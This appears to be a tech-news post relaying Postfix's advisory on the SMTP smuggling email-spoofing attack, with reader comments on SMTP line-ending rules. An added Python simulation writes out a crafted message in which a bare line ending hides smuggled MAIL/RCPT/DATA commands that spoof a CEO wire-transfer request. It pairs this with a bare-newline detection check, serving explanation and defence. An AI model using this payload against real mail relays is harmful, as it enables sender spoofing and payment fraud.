posted by hubie on Tuesday December 26, @01:07AM
from the start-off-the-New-Year-with-a-postfix-patch-Tuesday dept.

From https://www.postfix.org/smtp-smuggling.html :

Days before a 10+ day holiday break and associated production change freeze, SEC Consult has published an email spoofing attack that involves a composition of email services with specific differences in the way they handle line endings other than <CR><LF>.

Unfortunately, critical information provided by the researcher was not passed on to Postfix maintainers before publication of the attack, otherwise we would certainly have convinced SEC Consult to change their time schedule until after people had a chance to update their Postfix systems.

The attack involves a COMPOSITION of two email services with specific differences in the way they handle line endings other than <CR><LF>:

  - One email service A that does not recognize broken line endings in SMTP such as in <LF>.<CR><LF> in an email message from an authenticated attacker to a recipient at email service B, and that propagates those broken line endings verbatim when it forwards that message to:

  - One different email service B that does support broken line endings in SMTP such as in <LF>.<CR><LF>. When this is followed by "smuggled" SMTP MAIL/RCPT/DATA commands and message header plus body text, email service B is tricked into receiving two email messages: one message with the content before the <LF>.<CR><LF>, and one message with the "smuggled" header plus body text after the "smuggled" SMTP commands. All this when email service A sends only one message.

Postfix is an example of email service B. Microsoft's outlook.com was an example of email service A.

The "smuggled" SMTP MAIL/RCPT/DATA commands and header plus body text can be used to spoof email from any sender whose domain is hosted at email service A, to any recipient whose domain is hosted at email service B. Such email will pass SPF-based DMARC checks at email service B, because the smuggled message has a sender address that is hosted at email service A, and because the message was received from email service A.
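The composition above is easy to see in a few lines of code. The following is an added toy model, not Postfix's or outlook.com's code: service A is assumed to end DATA only at <CR><LF>.<CR><LF> and to relay the attacker's bytes unchanged (it sees "hello<LF>." as one line starting with "h", so it neither ends DATA there nor dot-stuffs it); service B is modelled as a strict receiver with the same rule and as a lenient receiver that also ends DATA at <LF>.<CR><LF>. Server replies are left out and the client side is treated as one pipelined byte stream; the domains, addresses and function names are placeholders.

```python
"""Toy receiver for the SMTP smuggling composition described above.

Constructed example, not Postfix or outlook.com code.  Service A (the
attacker's authenticated outbound relay) ends DATA only at
<CR><LF>.<CR><LF>, so it forwards the attacker's payload as ONE message.
Service B is modelled twice: a strict receiver with the same rule, and a
lenient receiver that also ends DATA at <LF>.<CR><LF>.  Server replies are
omitted; the client side is treated as one pipelined byte stream.  All
domains and addresses are placeholders.
"""
import re

BARE_LF = re.compile(rb"(?<!\r)\n")  # <LF> not preceded by <CR>


def iter_lines(stream, lenient):
    """Split a client byte stream into lines without their terminators.

    Strict:  a line ends only at <CR><LF>; a bare <LF> is ordinary data.
    Lenient: a line ends at <LF>, with or without a preceding <CR>.
    """
    parts = stream.split(b"\n" if lenient else b"\r\n")
    if parts and parts[-1] == b"":      # stream ended with a terminator
        parts.pop()
    for line in parts:
        if lenient and line.endswith(b"\r"):
            line = line[:-1]
        yield line


def receive_session(stream, lenient):
    """Run one SMTP session (MAIL/RCPT/DATA only); return accepted messages."""
    messages, state = [], "command"
    mail_from, rcpts, body = None, [], []
    for line in iter_lines(stream, lenient):
        if state == "data":
            if line == b".":             # end-of-data line
                messages.append({"mail_from": mail_from, "rcpt_to": rcpts,
                                 "data": b"\r\n".join(body)})
                mail_from, rcpts, body, state = None, [], [], "command"
            else:                        # RFC 5321 dot-unstuffing
                body.append(line[1:] if line.startswith(b".") else line)
            continue
        verb = line.upper()
        if verb.startswith(b"MAIL FROM:"):
            mail_from = line[len(b"MAIL FROM:"):].strip()
        elif verb.startswith(b"RCPT TO:"):
            rcpts.append(line[len(b"RCPT TO:"):].strip())
        elif verb == b"DATA":
            state = "data"
        # EHLO, QUIT etc. are ignored in this model
    return messages


def contains_bare_newline(stream):
    """True if the stream has an <LF> not preceded by <CR>: input a hardened
    receiver can refuse outright instead of guessing what the sender meant."""
    return BARE_LF.search(stream) is not None


# Constructed attacker message as submitted to service A.  A sees
# "hello<LF>." as one line that starts with "h", so it neither ends DATA
# there nor dot-stuffs it, and relays the bytes unchanged.
ATTACKER_MESSAGE = (
    b"From: attacker@service-a.example\r\n"
    b"To: victim@service-b.example\r\n"
    b"Subject: harmless\r\n"
    b"\r\n"
    b"hello\n"                                  # bare <LF> ...
    b".\r\n"                                    # ... makes <LF>.<CR><LF>
    b"MAIL FROM:<ceo@service-a.example>\r\n"    # smuggled envelope
    b"RCPT TO:<cfo@service-b.example>\r\n"
    b"DATA\r\n"
    b"From: ceo@service-a.example\r\n"
    b"To: cfo@service-b.example\r\n"
    b"Subject: urgent wire transfer\r\n"
    b"\r\n"
    b"Please pay invoice 4711 today.\r\n"
)

# What service A actually puts on the wire towards service B: ONE transaction.
STREAM_FROM_A = (
    b"MAIL FROM:<attacker@service-a.example>\r\n"
    b"RCPT TO:<victim@service-b.example>\r\n"
    b"DATA\r\n"
    + ATTACKER_MESSAGE
    + b".\r\n"                                  # A's own <CR><LF>.<CR><LF>
)

if __name__ == "__main__":
    for lenient in (False, True):
        msgs = receive_session(STREAM_FROM_A, lenient)
        print(f"{'lenient' if lenient else 'strict '} receiver: {len(msgs)} message(s)")
        for m in msgs:
            print("  from", m["mail_from"], "to", m["rcpt_to"])
    print("bare <LF> present:", contains_bare_newline(STREAM_FROM_A))
```

The strict receiver accepts one message whose body happens to contain the text "MAIL FROM:<ceo@service-a.example>"; the lenient receiver accepts two, and the second has an envelope sender at service A's domain that service A never authorised, which is why it passes an SPF-based DMARC check at B. The `contains_bare_newline` check is the shape of the fix: a receiver that refuses bare <LF> in SMTP input (the parameter Postfix added for this is `smtpd_forbid_bare_newline`) cannot be made to disagree with the sending side about where a line ends.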


  • (Score: 3, Touché) by Mojibake Tengu on Tuesday December 26, @03:20AM (3 children)

    by Mojibake Tengu (8598) on Tuesday December 26, @03:20AM (#1337754) Journal

    Two fools misunderstood each other. Which one is to blame?

    SMTP protocol is badly underdefined for ages... and that's fine. It is, since the very beginning, Simple Mail Transfer Protocol. Simple, you see?

    You guys had 40+ years to design some not-so-simple, real mail transfer protocol to agree upon, but even with all those past damages piled up, you completely wasted that time, for nothing.

    Even FidoNet mail tossers went to Abyss. All you can do now is... webmail. Disgusting.

    --
    Respect Authorities. Know your social status. Woke responsibly.
    • (Score: 1) by Splodgy Emoji on Tuesday December 26, @10:53AM (2 children)

      by Splodgy Emoji (15109) on Tuesday December 26, @10:53AM (#1337785)

      Most communications protocols are underdefined in certain ways. SMTP is not unique in that respect; see the history of ssh, etc.
      In this case, it appears that only Postfix has a vulnerability. Other open-source servers such as Exim and Sendmail do not have this vulnerability.

      • (Score: 3, Informative) by Anonymous Coward on Tuesday December 26, @02:23PM (1 child)

        by Anonymous Coward on Tuesday December 26, @02:23PM (#1337805)

        That's because Postfix is not following the standard.
        https://datatracker.ietf.org/doc/html/rfc772 [ietf.org]

        The sequence should be used to denote the end of a line of text.

        It is terminated by a line containing only a period

        So Tengu is trolling as usual, even the original RFC was not badly underdefined for this case.

        Now the message text is furnished, by giving a
              MAIL command with no "TO" argument.

                    S: MAIL FROM:<waldo@A><CRLF>
                    R: 354 Type mail, ended by <CRLF>.<CRLF>
                    S: Blah blah blah blah....etc. etc. etc.
                    S: <CRLF>.<CRLF>
                    R: 250 Mail sent

        • (Score: 1, Informative) by Anonymous Coward on Tuesday December 26, @02:25PM

          by Anonymous Coward on Tuesday December 26, @02:25PM (#1337806)
          Oops, failed to escape special chars - first quote should be:

          the <CRLF> sequence should be used to denote the end of a line of text.
  • (Score: 2) by driverless on Tuesday December 26, @09:40AM

    by driverless (4770) on Tuesday December 26, @09:40AM (#1337773)

    critical information provided by the researcher was not passed on to Postfix maintainers before publication of the attack

    I feel I was I feel I was denied... critical.... NEED TO KNOW.... INFORMATION [youtube.com].